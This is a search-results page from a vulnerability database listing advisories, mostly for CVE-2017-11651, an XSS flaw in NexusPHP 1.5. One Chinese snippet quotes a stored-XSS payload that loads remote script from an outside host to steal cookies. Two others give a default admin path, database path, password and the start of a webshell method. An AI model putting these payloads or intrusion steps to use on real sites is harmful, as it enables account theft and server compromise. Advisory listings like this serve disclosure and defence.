Lucene search
+L

10 matches found

euvd
euvd
added 2025/10/07 12:30 a.m.8 views

EUVD-2017-3263

Malware in sbrugna...

6.1CVSS6.3AI score0.00671EPSS
Exploits1References2
cnvd
cnvd
added 2017/07/27 12:0 a.m.7 views

NexusPHP Cross-Site Scripting Vulnerability (CNVD-2017-26595)

NexusPHP is a resource sharing community solution written in PHP developed by the Nexus team in China. A cross-site scripting vulnerability exists in NexusPHP version 1.5. A remote attacker can use the javascript: or data: URL in the UBBCode url tag to inject arbitrary web script or HTML...

6.1CVSS6.1AI score0.00671EPSS
Exploits1References1
nvd
nvd
added 2017/07/26 8:29 a.m.25 views

CVE-2017-11651

NexusPHP V1.5 has XSS via a javascript: or data: URL in a UBBCode url tag...

6.1CVSS6AI score0.00671EPSS
Exploits1References1
prion
prion
added 2017/07/26 8:29 a.m.21 views

Design/Logic Flaw

NexusPHP V1.5 has XSS via a javascript: or data: URL in a UBBCode url tag...

4.3CVSS5.9AI score0.00671EPSS
Exploits1References1Affected Software1
osv
osv
added 2017/07/26 8:29 a.m.11 views

CVE-2017-11651

NexusPHP V1.5 has XSS via a javascript: or data: URL in a UBBCode url tag...

6.1CVSS5.8AI score
Exploits0References1
cve
cve
added 2017/07/26 8:0 a.m.55 views

CVE-2017-11651

CVE-2017-11651 affects NexusPHP V1.5 with a cross-site scripting (XSS) flaw. The issue arises from a vulnerability in the UBBCode url tag that accepts javascript: or data: URLs, allowing injection of arbitrary web script or HTML. Public references include CNVD-2017-26595 and NVD/NIST records. Exp...

6.1CVSS5.9AI score0.00671EPSS
Exploits1References1Affected Software1
cvelist
cvelist
added 2017/07/26 8:0 a.m.29 views

CVE-2017-11651

NexusPHP V1.5 has XSS via a javascript: or data: URL in a UBBCode url tag...

6AI score0.00671EPSS
Exploits1References1
seebug
seebug
added 2013/09/27 12:0 a.m.20 views

Thinkphp官方网站存储型XSS漏洞一枚

简要描述: 可以在小洞上自由发辉成大洞 XSS小洞一个 详细说明: 讨论区发布话题对UBBcode未过滤完全 imge2.jpg"onerror="jQuery.getScript'http://1.tengzhou8.sinaapp.com/tp.js'" onload="jQuery.getScript'http://1.tengzhou8.sinaapp.com/tp.js'/img 危害:现在我只是小小的利用了一下赞和收藏功能,可模仿用户进行任意操作,盗COOKIE,登后台,危害较大 漏洞证明:...

7.1AI score
Exploits0
myhack58
myhack58
added 2012/06/13 12:0 a.m.17 views

Signaling network separate development site of source code vulnerabilities and fixes-vulnerability warning-the black bar safety net

Editor vulnerability the default background ubbcode/adminlogin. asp Database ubbcode/db/ewebeditor. mdb The default account password yzm 1 1 1 1 1 1 Get the webshell method Landing back click on the“style management”-select the new style just to write this a few style name:scriptkiddies Feel free...

0.1AI score
Exploits0
myhack58
myhack58
added 2011/08/09 12:0 a.m.20 views

Signaling network of independently developed web site source code 0day vulnerabilities-vulnerability warning-the black bar safety net

Author: script kiddies This website source code Super cow. Anti-implantation to upload very difficult to break. Background system/login. asp is also Into the ewebeditor is also anti-password A lot of big cattle are very difficult to engage the under This source code after a social worker was...

Exploits0
Rows per page
Query Builder